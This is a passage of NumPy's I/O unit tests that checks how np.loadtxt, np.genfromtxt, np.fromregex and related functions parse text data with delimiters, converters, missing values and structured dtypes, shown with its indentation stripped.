b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=np.int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C': lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
